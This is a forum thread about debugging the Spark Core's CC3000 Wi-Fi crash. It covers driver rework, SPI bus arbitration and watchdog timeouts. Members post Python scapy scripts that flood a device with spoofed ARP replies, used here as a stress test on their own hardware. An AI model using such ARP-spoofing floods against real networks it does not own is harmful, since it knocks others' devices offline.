Bug bounty: Kill the 'Cyan flash of death'

I actually did try it with a modified IP range that excluded both the router’s IP and the Spark Core’s IP to make sure I wasn’t interfering with anything that could cause problems otherwise. It still fails. One thing I notice is that if I send 4 ARP packets in a row, the CC3000 can handle it. If I start throwing more at it than that, it pukes. I wonder if putting a delay in between each ARP packet would give the CC3000 enough time to process them without problems.
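A rough sketch of the pacing idea, for anyone who wants to experiment. It is not a tested fix: the helper names (`spoofed_hosts`, `paced_flood`, `scapy_sender`) and the 50 ms default delay are assumptions made up for illustration. The sending step is passed in as a callback so the pacing and exclusion logic can be tried without scapy or root.

```python
import time

def spoofed_hosts(subnet, exclude, first=2, last=254):
    """Yield (last_octet, ip) for each host in the /24, skipping excluded IPs."""
    for i in range(first, last + 1):
        ip = '%s.%d' % (subnet, i)
        if ip not in exclude:
            yield i, ip

def paced_flood(send_one, subnet, exclude, delay_s=0.05, sleep=time.sleep):
    """Call send_one(src_ip, fake_mac) once per host, pausing between packets."""
    sent = 0
    for i, ip in spoofed_hosts(subnet, exclude):
        send_one(ip, 'FF:FF:FF:FF:FF:%02X' % i)
        sent += 1
        sleep(delay_s)  # hypothetical pacing value; tune it to find the threshold
    return sent

def scapy_sender(victim):
    """Build a send_one callback that emits one ARP reply via scapy (needs root)."""
    from scapy.all import ARP, send  # imported lazily so the helpers run without scapy
    def send_one(src_ip, fake_mac):
        send(ARP(op=2, psrc=src_ip, pdst=victim, hwdst=fake_mac), verbose=False)
    return send_one
```

Something like `paced_flood(scapy_sender('192.168.1.131'), '192.168.1', {'192.168.1.1', '192.168.1.131'}, delay_s=0.1)` would then skip the router and the Core and leave 100 ms between packets.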

I’m not very strong in Python, and I need to get off the computer for the night, so if anyone else wants to play with it, I’d love to hear the results.


Latest uptime 119152335 / 1000 / 60 / 60 = 33.09 hours :smiley:

It breaks my CC3000 EVM hooked to the RF ports of my MSP430 FraunchPad with the Energia drivers/firmware and the same CC3000 EVM with TI's latest firmware and demo app hooked to a Tiva C LaunchPad via the Sensor Booster Pack.

So there are ARP issues going on for sure!

@Hypnopompia Thank you for the tool!

@wtfuzz @BDub @zachary

Some good news. I tested https://github.com/davids5/spark-* at master + wan_watchdogs + tcp_server_fix and it recovers from the ARP flood in 25 seconds.


@pra Nice analysis!
Below is how the reworked CC3000 code handles the issues:

Buffer sizes

New Driver:
Send side: may or may not result in more than one TCP packet, depending on TI's policy for holding a packet before sending.
Receive side: the driver has a SPARK_ASSERT(data_to_recv <= arraySize(wlan_rx_buffer)); that will panic (SOS on the red LED, then the AssertionFailure code, 10 blinks) if it ever happens. Never seen one :smile:

Endless Loops in CC3000_Spi

There were all kinds of wrong edge detection and races.

All of this has been reworked to support the TI IRQ requirements, with read-request preemption on a host write to handle the race between an unsolicited event from the CC3000 and a host write. Once the driver is in the idle state, writes are committed with an atomic CS assertion.

Potential Endless Loop in Evnt_handler

The new driver has a timeout mechanism on the event handler, which returns to the application with failure codes as per the socket.h API (à la the BSD sockets API, well, almost ;( ).
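To illustrate the general shape of a bounded wait (the real driver is C firmware; this is only a Python model), here is a minimal sketch. `wait_for_event`, `ETIMEDOUT` and its value are hypothetical stand-ins, not the driver's actual names or error codes.

```python
import time

ETIMEDOUT = -1  # hypothetical failure code standing in for the driver's real value

def wait_for_event(poll, timeout_s, clock=time.monotonic):
    """Poll until poll() returns a non-None event or the deadline passes.

    Returns (0, event) on success and (ETIMEDOUT, None) on timeout, so the
    caller always gets control back instead of spinning forever.
    """
    deadline = clock() + timeout_s
    while clock() < deadline:
        event = poll()
        if event is not None:
            return 0, event
    return ETIMEDOUT, None
```

The point is simply that the loop condition depends on a clock as well as on the CC3000, so a silent radio turns into an error code the application can act on.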

Probable Missed Interrupts

This has been reworked. The DMA is streamlined. The WIF_INT assertion schedules the DMA. On completion of the DMA, the buffer is dropped off for consumption by the unsolicited event handler with only WIF_INT masked. If the unsolicited event handler consumes the packet, WIF_INT interrupts are unmasked (the NVIC will assert a CPU IRQ if there was a falling edge on WIF_INT while it was masked). If it does not, the assumption is that it was a solicited IRQ resulting from a write. The code handles that as well. None of the WIF_INT masking is an issue because the CC3000 has no queueing: there can be only one outstanding request at a time.
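The "pending while masked" behaviour described above can be modelled in a few lines. This is a toy Python model, not the firmware: `LatchedIrq` and its methods are invented for illustration, and the single `pending` flag reflects the stated assumption that only one request can be outstanding.

```python
class LatchedIrq:
    """Toy model of an interrupt line whose edges are latched while masked."""

    def __init__(self, handler):
        self.handler = handler
        self.masked = False
        self.pending = False

    def edge(self):
        """A falling edge arrives: run the handler now, or remember it if masked."""
        if self.masked:
            self.pending = True
        else:
            self.handler()

    def mask(self):
        self.masked = True

    def unmask(self):
        """Unmasking delivers a latched edge, so nothing is lost while masked."""
        self.masked = False
        if self.pending:
            self.pending = False
            self.handler()
```

In this model an edge that arrives between `mask()` and `unmask()` is delivered exactly once on unmask, which is why masking during buffer hand-off does not drop an interrupt.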

I have posted a PDF I made of the issues and fixes reported to Spark.

http://nscdg.com/spark/David_Sidrane's_rework_of_the_TI_CC3000_driver_for_Spark.pdf

Aloha,

David


I’m really excited about this script, can’t wait to try this here in captivity. :slight_smile:

Edit: Also, I love checking this thread in the morning.


In the rewritten driver, is there consideration for the SPI being shared with the serial flash? Looking at your cc3000_spi.c, the EXTI handler can initiate the SPI DMA immediately. If the user code is in the middle of a read/write operation to the sflash when WIFI_INT triggers, the DMA would need to be held off until the sflash operation completes.

In the baseline spark-core software I suspect this will cause problems with OTA updates, when packets of the new firmware are written to the sflash before restarting into the bootloader to write them back to the STM32 flash.

edit: One solution is for the sflash driver to mask off WIFI_INT before asserting the sflash CS. Likewise, the sflash code is not checking for the SPI responding to a CC3000 unsolicited event. I have not taken as deep a dive into the CC3000 driver as you have, though I suspect there are sflash/CC3000 bus-sharing issues lurking here.

Excellent point. We will need arbitration. The CC3000 driver has SpiPause/Resume functions that mask/unmask the interrupts. We can create a single point of arbitration, a LOCK(&spi) / UNLOCK(&spi) sort of deal… Skype me to discuss: david_s5
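One possible shape for that single point of arbitration, modelled in Python purely to make the idea concrete. `SpiArbiter`, its methods, and the choice to pause the CC3000 interrupt on every successful lock are assumptions for illustration, not the design that was actually agreed on.

```python
class SpiArbiter:
    """Model of one lock guarding a bus shared by the CC3000 and the sflash."""

    def __init__(self, pause_irq, resume_irq):
        # pause_irq / resume_irq stand in for the driver's SpiPause/Resume hooks
        self._pause_irq = pause_irq
        self._resume_irq = resume_irq
        self.owner = None

    def lock(self, owner):
        """Take the bus if it is free; returns False if someone else holds it."""
        if self.owner is not None:
            return False
        self._pause_irq()  # mask the CC3000 interrupt before any CS is asserted
        self.owner = owner
        return True

    def unlock(self, owner):
        """Release the bus and let any latched CC3000 interrupt through."""
        if self.owner != owner:
            raise RuntimeError('unlock by non-owner: %r' % (owner,))
        self.owner = None
        self._resume_irq()
```

The sflash code would wrap each transfer in `lock('sflash')` / `unlock('sflash')`, and the CC3000 side would do the same, so neither driver has to inspect the DMA or SPI hardware state of the other.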

Your Python script looks great for testing. Any chance this is easy to convert to Node.js? I have a lot more fun with Node than Python :wink:

#! /usr/bin/env python

# on Ubuntu:
# sudo apt-get install python-scapy

# You'll need to run this script as root to send these ARP packets

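from scapy.all import ARP, send

victim = '192.168.1.131' # ip address of CC3000
subnet = '192.168.1'
for i in range(2,255): # assumes your gateway is .1 - skip it so we don't break the ARP cache for the router
	a = ARP()
	a.op = 2 # 2 = ARP reply ("is-at")
	a.psrc = '%s.%s' % (subnet, i) # spoofed sender IP, one per host in the subnet
	a.pdst = victim
	a.hwdst = 'FF:FF:FF:FF:FF:%0.2X' % (i) # made-up MAC, last byte follows the host number
	a.display() # print the packet fields before sending
	send(a)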

I would have rather written it in Node if I could have. I couldn’t find any low-level libraries to deal with ARP other than just reading it. It would probably take some C coding to create a Node module, on top of just writing the Node script.

Thanks for that - forwarded to TI.
I’m on the road at present, and cannot run it and grab the debug logs personally for another ~36 hours.

Regardless of any other behaviour, we need the CC3000 to be more robust in the face of ARP attacks/strangeness; that is non-negotiable.


@zachary @zach I just submitted two pull requests that will stabilize the master repos.
The TCP WAIT_CLOSE was not working correctly; it has been reworked to use the CC3000 driver’s socket state. Also, all the redundant timers have been removed in favor of the CC3000 event handler supporting timeouts from my last PRs.

I also fixed what I think may have been a classic hardware watchdog misuse: kicking the dog in the ISR?

Yep. I'm going to check out your code in a sec because I've also been writing code to correct the watchdog.

EDIT: Ok I see you are kicking the dog at the top of the main() loop. But the reload timer is still 3 seconds. This is bad because it will not allow user code to block for more than 3 seconds. Also, if the code gets stuck in some kind of OFFLINE mode, it will constantly loop in the main() loop keeping the system alive.
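Both concerns can be seen in a tiny simulation. This is a Python model only, with invented names (`SimWatchdog`, `run_loop`); it assumes the dog is kicked once at the top of each main-loop pass and that the reload period is 3 seconds, as described above.

```python
class SimWatchdog:
    """Countdown model of a hardware watchdog with a fixed reload period."""

    def __init__(self, reload_s):
        self.reload_s = reload_s
        self.remaining = reload_s
        self.fired = False

    def kick(self):
        self.remaining = self.reload_s

    def advance(self, seconds):
        """Let time pass; the dog fires once the countdown reaches zero."""
        self.remaining -= seconds
        if self.remaining <= 0:
            self.fired = True

def run_loop(wd, pass_durations):
    """Kick at the top of each pass; return the index of the pass that
    tripped the watchdog, or None if it never fired."""
    for i, duration in enumerate(pass_durations):
        wd.kick()
        wd.advance(duration)
        if wd.fired:
            return i
    return None
```

A pass that blocks for 4 seconds trips the dog, while a loop that spins quickly without ever getting online never does, because each pass still kicks it.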

It's also very hard to tell how all of the other software timers you've implemented are working together with the IWDG watchdog... have you sketched out any kind of flow chart or timing diagram for all of these timeouts and loops? If not I think it's going to be very hard to know what various outcomes will be based on hypothetical blocking of user code or long delays in connecting to the internet/wlan. Personally I have not done this myself either, because I just haven't dived into all of the background code yet.

Please see our discussion here about the watchdog timer and my code that is currently being tested:

I believe it's sufficient, when the sflash begins writing on the SPI, to 1) check if the DMA is in progress and busy-wait until the DMA is complete, and 2) instead of starting the DMA in the interrupt handler, update the CC3000 state so that the DMA is started on the next periodic call to the CC3000 driver (add a wlan_tick()).

The solicited responses are driven by wlan API calls, which are all blocking; is this correct? Currently the sflash SPI routines are all blocking, polled I/O to the peripheral.

I have fairly limited time to look at this over the next few weeks but will take a look at your changes on master once they settle, or if you would like to suggest an implementation I can make the required changes to sflash.

I am open for a discussion when you have time, but here is my thinking at this point...

Yes but there can be and are unsolicited responses while in the busy wait.

Since we want both subsystems to be as fast as they can be with the fewest interactions, I would prefer not to use a wlan_tick.

I think that staying above the HW for arbitration will be cleaner. The CC3000 driver already has to deal with host write vs. CC3000 unsolicited request, so it has arbitration built in. I think we should add an API and enhance the arbitrator, as opposed to splitting the IRQ-to-DMA path in the driver and looking at the DMA or SPI hardware directly. The benefit of the decoupling will be portability and the ability to use DMA with other peripherals without side effects.

@BDub

Good points! What is the max we should allow a loop to run?

The network timeouts for operations default to 20 sec, but the timeout is kicked down to 8 sec for sparkprotocol and internet test connect operations.

So what I moved is a problem (unless the WD can run at 30 sec), my bad. What is the max we can set the IWDG to?

All the timeouts cause the errors to bubble up, and the main loop/sparkprotocol will fail and cause only the CC3000 to be reset.

The timers I have added are (including the yet-to-be-merged PRs):

The CC3000 calls to “read” the results of a command: “network timeouts”, 20 sec default, but can be saved/changed and restored.

The CC3000 calls to send when a buffer is not available. Same timeout: “network timeouts”, 20 sec default, but can be saved/changed and restored.

Once bubbled up, the failures are counted (cfod_count): the CC3000 is reset if the connect to the cloud and the test to the internet fail.

There is a SW WD timer that times from WiFi connect until the Spark has an address (DHCP or static).
There is a SW WD timer that times from WiFi disconnect to WiFi connect.

If there are timeouts, the CC3000 is reset.

So I ran the ARP Python script, and it causes no problems in my test setup. Now that I look at it closely, I’m not really sure why it would: it just broadcasts a bunch of spurious ARPs. I’m going to rewrite it to spoof ARP requests of the core and see if that tips it over instead.

Modifying the Python ARP script to flood the CC3000 with ARP requests does not appear to have any material impact either.

It might depend on your network. It’s knocking my Core offline, along with my MSP430 and Tiva C boards with a CC3000 Evaluation Module.

OK, the max the IWDG can be is 26.208 seconds, with the prescaler set to 256 and the reload value set to 0x0FFF.
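For reference, the 26.208 second figure falls out of prescaler × reload / LSI frequency. The sketch below assumes a nominal 40 kHz LSI clock, which is an assumption rather than something stated in this thread; `iwdg_timeout_s` is a made-up helper name.

```python
LSI_HZ = 40000  # ASSUMPTION: nominal LSI clock; the real oscillator is not precise

def iwdg_timeout_s(prescaler, reload, lsi_hz=LSI_HZ):
    """Watchdog window in seconds for a given prescaler and reload value."""
    return prescaler * reload / float(lsi_hz)

# Prescaler 256 with reload 0x0FFF (4095) gives the maximum window quoted above.
max_window = iwdg_timeout_s(256, 0x0FFF)
```

With these numbers the 20 sec network timeout fits inside the window, but since the LSI frequency varies from part to part, the real margin may be smaller than the computed one.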

I think the IWDG should be set higher than all of the other SW timeouts, only if those software timeouts result in calling NVIC_SystemReset(); that is the only thing besides IWDG that can get the system out of a stuck state.

So if you are telling me that all of the SW timeouts you have implemented are set to about 20 seconds, I think that works out well. However it only gives the Core 20 seconds to connect to WLAN and/or connect to the CLOUD and/or perform the HANDSHAKE… I guess this seems like enough time… and if not, a reset gives it 20 more seconds! lol.

The other case to question is the SmartConfig which can take a long time to complete… so maybe the watchdog would need to be kicked in that loop a couple times. It’s a special mode anyway, and as long as that BLUE led is blinking… the interrupts are still working and a counter can be running to ultimately timeout after something like 2 minutes? If the SmartConfig loop locked for some reason, a solid blue LED or blank LED would likely indicate to the user they need to reset, but the IWDG would also kick in under those conditions.
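A sketch of what such a loop could look like, as a Python model rather than firmware. `smartconfig_wait` and its callbacks are hypothetical, and the 120 second limit is just the "something like 2 minutes" figure from above.

```python
def smartconfig_wait(is_done, kick_watchdog, now, timeout_s=120.0):
    """Wait for SmartConfig to finish, kicking the watchdog on every pass.

    Returns True if is_done() reported completion, False once the overall
    timeout expires. If the loop itself locks up, the kicks stop and the
    hardware watchdog resets the system as usual.
    """
    start = now()
    while now() - start < timeout_s:
        kick_watchdog()
        if is_done():
            return True
    return False
```

The overall timeout bounds the special mode, while the per-pass kick keeps the IWDG from firing during a legitimately long wait.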

I think we should let the user code run up to 26.208 seconds… unless they want to kick the watchdog, AND kick the WLAN loop from their code, then they can run as long as they want… I think.